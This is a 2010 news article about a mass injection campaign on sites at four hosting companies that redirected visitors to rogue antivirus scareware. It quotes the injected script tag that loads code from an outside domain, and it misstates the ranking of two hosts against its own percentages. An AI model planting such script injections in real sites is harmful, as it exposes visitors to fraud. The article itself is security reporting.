A Mass Injection Attack Targeting Web Hosting Networks

Greatresponder.com – 2010-09-27 – In accordance to the data that’s published by Websense (an e-mail and web security solution service provider company), a bulk injection attack aiming web hosting companies is becoming a significant worry. Clients going to these hacked web sites are going to be redirected to rouge anti-virus (AV) web sites.

The security service states that the target web hosting providers are four well-known hosting firms – BlueHost, Bizland, Go Daddy and also DreamHost.

Websense also states that in the 1st 7 days of September 2010, the quantity of affected web sites inceased from 22,000 to nearly 39,000 based on the day. Based on the information collected by Websense, BlueHost was by far the most affected web hosting provider and accounted for 38% of compromised web sites. It was followed by DreamHost having 28%. Go Daddy and BizLand   acquired the fourth and third spot with 12% and 19% respectively.

Explanation of the attack method, security research workers declared that the cyber-crooks utilized similar injections to place in a PHP tag link in the script tag at end of each hacked page as shown:<script src=”http://www.kdjkfjskdfjlskdjf.com/js.php”></script></body>.

The external code check if the consumer was attacked previously or not. If the consumer wasn’t attacked, it redirects him to web sites in the .co.cc domain space, that show many bogus antivirus warnings typically linked with scareware campaigns.

As per the security specialists at Websense, the reason of those false warnings is to influence customers to install rouge antivirus software, that further floods their computers with false alerts to trick them into paying license charges.

Both malicious domain names (i.e. whereisdudescars.com and losotrana.com) linked with the attack were also responsible in a similar bulk compromise within July 2010.